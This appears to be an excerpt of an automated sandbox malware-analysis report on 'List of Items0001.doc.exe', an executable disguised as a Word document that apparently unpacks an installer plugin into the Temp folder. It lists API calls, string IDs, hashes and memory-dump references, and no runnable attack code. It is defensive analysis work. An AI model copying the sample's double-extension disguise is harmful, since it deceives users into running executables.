                                                  • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\List of Items0001.doc.exe,80000000,00000003), ref: 0040615C
                                                  • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                • API String ID: 2171350718-2295842750
                                                • Opcode ID: 07ea5d3dd502240bf86d0c298f94c43ad2335bec49c481c59c36197298e6ebad
                                                • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                • Opcode Fuzzy Hash: 07ea5d3dd502240bf86d0c298f94c43ad2335bec49c481c59c36197298e6ebad
                                                • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                Download Yara Rule
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                • GetSysColor.USER32(00000000), ref: 00404686
                                                • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                • SetBkMode.GDI32(?,?), ref: 0040469E
                                                • GetSysColor.USER32(?), ref: 004046B1
                                                • SetBkColor.GDI32(?,?), ref: 004046C1
                                                • DeleteObject.GDI32(?), ref: 004046DB
                                                • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76693420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                • CharNextW.USER32(?,00000000,76693420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                • CharPrevW.USER32(?,?,76693420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-1484220669
                                                • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                • GetTickCount.KERNEL32 ref: 00403067
                                                • wsprintfW.USER32 ref: 00403095
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                  • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,004030A8,004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000), ref: 00405725
                                                  • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00405737
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
                                                • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                  • Part of subcall function 00403012: MulDiv.KERNEL32(00008000,00000064,00008198), ref: 00403027
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 722711167-2449383134
                                                • Opcode ID: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                • Opcode Fuzzy Hash: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                • GetMessagePos.USER32 ref: 00404FA2
                                                • ScreenToClient.USER32(?,?), ref: 00404FBC
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                • wsprintfW.USER32 ref: 00402FE5
                                                • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                • API String ID: 1451636040-1158693248
                                                • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                Function 6DB62655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 6DB612BB: GlobalAlloc.KERNEL32(00000040,?,6DB612DB,?,6DB6137F,00000019,6DB611CA,-000000A0), ref: 6DB612C5
                                                • GlobalFree.KERNEL32(?), ref: 6DB62743
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB62778
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                • Associated: 00000000.00000002.674065823896.000000006DB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065893260.000000006DB64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065926322.000000006DB66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6db60000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 60860c5ce65c20b4a9e25642041aab4e92275ed317506acad17f847c824978dc
                                                • Instruction ID: 39c7a048c6474790e538adf479954e00919b86c901da1ed7726e679b7b3713c5
                                                • Opcode Fuzzy Hash: 60860c5ce65c20b4a9e25642041aab4e92275ed317506acad17f847c824978dc
                                                • Instruction Fuzzy Hash: 4431AD716085C2EFEB268F64C994D3E77B6FB8B344316852DF202932A8C731AC159B75
                                                Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                • wsprintfW.USER32 ref: 00404F1B
                                                • SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s$H7B
                                                • API String ID: 3540041739-107966168
                                                • Opcode ID: 2edccdcb36c72f9bdce7a586f7ca7ee262dfb9f9a49697097ea36a1117f17e36
                                                • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                • Opcode Fuzzy Hash: 2edccdcb36c72f9bdce7a586f7ca7ee262dfb9f9a49697097ea36a1117f17e36
                                                • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                Function 6DB62480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB625C2
                                                  • Part of subcall function 6DB612CC: lstrcpynW.KERNEL32(00000000,?,6DB6137F,00000019,6DB611CA,-000000A0), ref: 6DB612DC
                                                • GlobalAlloc.KERNEL32(00000040), ref: 6DB62548
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6DB62563
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                • Associated: 00000000.00000002.674065823896.000000006DB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065893260.000000006DB64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065926322.000000006DB66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6db60000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID:
                                                • API String ID: 4216380887-0
                                                • Opcode ID: 7e0d4cd5e12198ce65dda3aea537e0fd7e412ff216c3438e4e33829c10edaf50
                                                • Instruction ID: 6abc3c227f4f1b8a538318b243acf67ca7b98091d1cf11a24b2d079e4f8dd680
                                                • Opcode Fuzzy Hash: 7e0d4cd5e12198ce65dda3aea537e0fd7e412ff216c3438e4e33829c10edaf50
                                                • Instruction Fuzzy Hash: 2E41BCB01082C6EFEB359F28D850A3A77F8FB4A754F01891DEA4687289E730A544CB71
                                                Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
